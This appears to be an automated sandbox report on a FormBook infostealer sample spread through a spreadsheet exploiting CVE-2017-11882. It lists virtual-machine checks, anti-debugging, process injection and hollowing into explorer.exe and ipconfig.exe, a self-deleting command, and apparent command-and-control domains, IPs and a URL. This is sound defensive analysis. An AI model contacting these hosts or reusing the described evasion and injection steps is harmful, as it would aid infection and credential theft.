Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmp	Binary or memory string: >m%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\8
Source: explorer.exe, 00000006.00000000.2145883576.00000000041DB000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmp	Binary or memory string: VMwareHD?m
Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000006.00000002.2344866221.0000000000231000.00000004.00000020.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmp	Binary or memory string: vmware8

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 5_2_004088C0 rdtsc

5_2_004088C0

Source: C:\Users\Public\vbc.exe

Code function: 5_2_00409B30 LdrLoadDll,

5_2_00409B30

Source: C:\Users\Public\vbc.exe	Code function: 5_2_00900080 mov ecx, dword ptr fs:[00000030h]	5_2_00900080
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009000EA mov eax, dword ptr fs:[00000030h]	5_2_009000EA
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009226F8 mov eax, dword ptr fs:[00000030h]	5_2_009226F8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023B26F8 mov eax, dword ptr fs:[00000030h]	7_2_023B26F8

Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 52.58.78.16 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 85.10.195.227 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 160.124.66.42 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 188.93.150.44 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 66.235.200.146 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 66.96.162.138 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 92.42.39.29 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.161.187.200 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.16.16.194 80	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\Public\vbc.exe	Thread register set: target process: 1388			Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Thread register set: target process: 1388			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\Public\vbc.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\Public\vbc.exe

Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: F70000

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe {path}	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: explorer.exe, 00000006.00000002.2345075431.00000000006F0000.00000002.00000001.sdmp, ipconfig.exe, 00000007.00000002.2345095508.0000000000F80000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000002.2345075431.00000000006F0000.00000002.00000001.sdmp, ipconfig.exe, 00000007.00000002.2345095508.0000000000F80000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000002.2344827984.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000002.2345075431.00000000006F0000.00000002.00000001.sdmp, ipconfig.exe, 00000007.00000002.2345095508.0000000000F80000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Users\Public\vbc.exe

Queries volume information: C:\Users\Public\vbc.exe VolumeInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000002.2344836687.00000000002F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2136258521.0000000003341000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2344806052.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2170693732.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2170740872.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2170766828.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2136301403.00000000033BB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000002.2344836687.00000000002F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2136258521.0000000003341000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2344806052.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2170693732.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2170740872.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2170766828.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2136301403.00000000033BB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Windows Service1	Windows Service1	Masquerading111	OS Credential Dumping	Security Software Discovery321	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution13	Boot or Logon Initialization Scripts	Process Injection612	Virtualization/Sandbox Evasion3	LSASS Memory	Virtualization/Sandbox Evasion3	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer14	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools11	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection612	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol23	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information41	Cached Domain Credentials	System Network Configuration Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing13	DCSync	File and Directory Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery113	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Shipping documents.xlsx	33%	ReversingLabs	Document-Word.Exploit.CVE-2017-11882

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	29%	ReversingLabs	Win32.Trojan.Generic
C:\Users\Public\vbc.exe	29%	ReversingLabs	Win32.Trojan.Generic

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
5.2.vbc.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
nziyade.com	0%	Virustotal		Browse
antillean-network.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.bigdillenergy.com	0%	Avira URL Cloud	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://cgi.search.biglobe.ne.jp/favicon.ico	0%	Avira URL Cloud	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://buscar.ozu.es/	0%	Avira URL Cloud	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://www.ozu.es/favicon.ico	0%	Avira URL Cloud	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://www.bigdillenergy.com/sqe3/?cB=WEY89Cif+pIi2MLF1zVwoU92FBjT7mYFKn7NGwcjA7VjLh+ShZmG13goYNxo9cFbZs7f6w==&NreT=XJE0G4nHflj	0%	Avira URL Cloud	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://www.iask.com/	0%	URL Reputation	safe
http://www.iask.com/	0%	URL Reputation	safe
http://www.iask.com/	0%	URL Reputation	safe
http://cgi.search.biglobe.ne.jp/	0%	Avira URL Cloud	safe
http://search.ipop.co.kr/favicon.ico	0%	URL Reputation	safe
http://search.ipop.co.kr/favicon.ico	0%	URL Reputation	safe
http://search.ipop.co.kr/favicon.ico	0%	URL Reputation	safe
http://p.zhongsou.com/favicon.ico	0%	Avira URL Cloud	safe
http://www.bigdillenergy.com/	0%	Avira URL Cloud	safe
http://service2.bfast.com/	0%	URL Reputation	safe
http://service2.bfast.com/	0%	URL Reputation	safe
http://service2.bfast.com/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.moveoneic.com	66.96.162.138	true	true		unknown
nziyade.com	92.42.39.29	true	true	0%, Virustotal, Browse	unknown
antillean-network.com	85.10.195.227	true	true	0%, Virustotal, Browse	unknown
www.coloringprintouts.com	52.58.78.16	true	true		unknown
parking.namesilo.com	192.161.187.200	true	false		high
www.bigdillenergy.com	52.58.78.16	true	true		unknown
www.mondzorg-postma.com	188.93.150.44	true	true		unknown
shops.myshopify.com	23.227.38.74	true	true		unknown
ktproductreviews.com	66.235.200.146	true	true		unknown
www.yanasacha.com	160.124.66.42	true	true		unknown
target.clickfunnels.com	104.16.16.194	true	false		high
www.nziyade.com	unknown	unknown	true		unknown
www.cocogreensoil.com	unknown	unknown	true		unknown
www.gregoryrecommends.com	unknown	unknown	true		unknown
www.integratednourishment.com	unknown	unknown	true		unknown
www.ktproductreviews.com	unknown	unknown	true		unknown
www.antillean-network.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.bigdillenergy.com/sqe3/?cB=WEY89Cif+pIi2MLF1zVwoU92FBjT7mYFKn7NGwcjA7VjLh+ShZmG13goYNxo9cFbZs7f6w==&NreT=XJE0G4nHflj	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://search.chol.com/favicon.ico	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.mercadolivre.com.br/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.bigdillenergy.com	ipconfig.exe, 00000007.00000002.2345511470.0000000002A12000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.merlin.com.pl/favicon.ico	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.ebay.de/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.mtv.com/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.rambler.ru/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.nifty.com/favicon.ico	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.dailymail.co.uk/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www3.fnac.com/favicon.ico	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://buscar.ya.com/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.yahoo.com/favicon.ico	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.iis.fhg.de/audioPA	explorer.exe, 00000006.00000000.2149883651.0000000004B50000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sogou.com/favicon.ico	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://asp.usatoday.com/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://fr.search.yahoo.com/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://rover.ebay.com	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://in.search.yahoo.com/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://img.shopzilla.com/shopzilla/shopzilla.ico	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.ebay.in/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://image.excite.co.jp/jp/favicon/lep.ico	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://%s.com	explorer.exe, 00000006.00000000.2161496067.000000000A330000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://msk.afisha.ru/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	vbc.exe, 00000004.00000002.2135887620.0000000002341000.00000004.00000001.sdmp	false		high
http://busca.igbusca.com.br//app/static/images/favicon.ico	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.rediff.com/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.windows.com/pctv.	explorer.exe, 00000006.00000000.2144874723.0000000003C40000.00000002.00000001.sdmp	false		high
http://www.ya.com/favicon.ico	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.etmall.com.tw/favicon.ico	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://it.search.dada.net/favicon.ico	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.naver.com/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.google.ru/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.hanafos.com/favicon.ico	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://cgi.search.biglobe.ne.jp/favicon.ico	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.abril.com.br/favicon.ico	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.daum.net/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.naver.com/favicon.ico	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.msn.co.jp/results.aspx?q=	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.clarin.com/favicon.ico	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://buscar.ozu.es/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://kr.search.yahoo.com/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.about.com/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://busca.igbusca.com.br/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.ask.com/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.priceminister.com/favicon.ico	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.cjmall.com/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.centrum.cz/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://suche.t-online.de/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.google.it/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.auction.co.kr/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.ceneo.pl/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.amazon.de/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	explorer.exe, 00000006.00000000.2156461233.00000000082FD000.00000004.00000001.sdmp	false		high
http://sads.myspace.com/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://busca.buscape.com.br/favicon.ico	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.pchome.com.tw/favicon.ico	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://browse.guardian.co.uk/favicon.ico	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://google.pchome.com.tw/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://list.taobao.com/browse/search_visual.htm?n=15&q=	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.rambler.ru/favicon.ico	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://uk.search.yahoo.com/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://espanol.search.yahoo.com/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.ozu.es/favicon.ico	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.sify.com/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://openimage.interpark.com/interpark.ico	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.yahoo.co.jp/favicon.ico	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.ebay.com/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.gmarket.co.kr/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
